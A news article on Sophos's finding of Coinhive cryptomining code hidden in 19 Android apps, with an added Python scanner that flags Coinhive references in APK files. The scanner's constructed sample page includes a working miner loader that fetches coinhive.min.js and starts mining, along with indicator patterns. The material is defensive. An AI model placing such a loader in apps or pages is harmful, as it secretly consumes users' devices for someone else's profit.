This article is based on a 13-page report published last week by UK cyber-security firm Sophos. According to the company, its engineers found 19 Android applications that were uploaded to and made available through the official Google Play Store.
Sophos says these apps were loading an instance of the Coinhive script externally, without the user's knowledge.
The malicious code executed when the user started the app and the app opened a WebView browser instance.
In some cases, where the app had no reason to open a browser window, the WebView element was hidden from view and the code ran in the background.
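A static check for this pattern, added here as an example and not taken from the Sophos report: it scans an APK's bundled web content and compiled code for references to the Coinhive miner. The indicator strings (the public Coinhive script and API names), the file names and both sample APKs are assumptions constructed for illustration, and the check only catches references stored as plain text.

```python
import io
import re
import zipfile

# Assumed indicators: names used by the public Coinhive JavaScript miner.
INDICATORS = [rb"coinhive\.min\.js", rb"CoinHive\.(Anonymous|User|Token)", rb"coinhive\.com"]
PATTERN = re.compile(b"|".join(INDICATORS), re.IGNORECASE)
# Bundled web pages/scripts and compiled code (DEX stores ASCII strings verbatim).
SCAN_SUFFIXES = (".html", ".htm", ".js", ".dex")
MAX_ENTRY_BYTES = 64 * 1024 * 1024  # skip oversized entries instead of inflating them


def scan_apk(apk_bytes):
    """Return sorted (entry_name, indicator) pairs for miner references in an APK."""
    findings = set()
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as apk:
        for info in apk.infolist():
            if not info.filename.lower().endswith(SCAN_SUFFIXES):
                continue
            if info.file_size > MAX_ENTRY_BYTES:
                continue
            for match in PATTERN.finditer(apk.read(info)):
                findings.add((info.filename, match.group(0).decode("ascii").lower()))
    return sorted(findings)


def build_sample_apk(files):
    """Build a constructed APK-shaped ZIP in memory from {entry_name: bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        for name, data in files.items():
            archive.writestr(name, data)
    return buf.getvalue()


# Constructed samples, not the apps listed in the Sophos report.
MINER_PAGE = b"""<html><body>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER').start();</script>
</body></html>"""
SUSPECT_APK = build_sample_apk({
    "classes.dex": b"dex\n035\x00 file:///android_asset/engine.html ",
    "assets/engine.html": MINER_PAGE,
})
CLEAN_APK = build_sample_apk({
    "classes.dex": b"dex\n035\x00 ",
    "assets/help.html": b"<html><body>Help</body></html>",
})

if __name__ == "__main__":
    for label, apk in (("suspect", SUSPECT_APK), ("clean", CLEAN_APK)):
        print(label, scan_apk(apk))
```

A hit is a lead for manual review of the app, and an obfuscated or remotely fetched page will not be caught by this string match.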
Sophos discovered this technique in 19 apps distributed via four developer accounts. Most apps barely made it to 100-500 installs, but one app, extreme.action.wwe.wrestin, was installed on between 100,000 and 500,000 devices.
The apps were uploaded to the Play Store around Christmas, and Sophos researchers reported all of them to Google. All have been removed from the official Play Store at the time of writing.
A list of all 19 Coinhive-laden apps is available on page 7 of the Sophos report, and users can review the list to see if they installed any of the apps on their devices.
Sophos dubbed this malware CoinMiner and says it found it embedded in 10 apps made available through the coandroid.ru website, a third-party Android app store.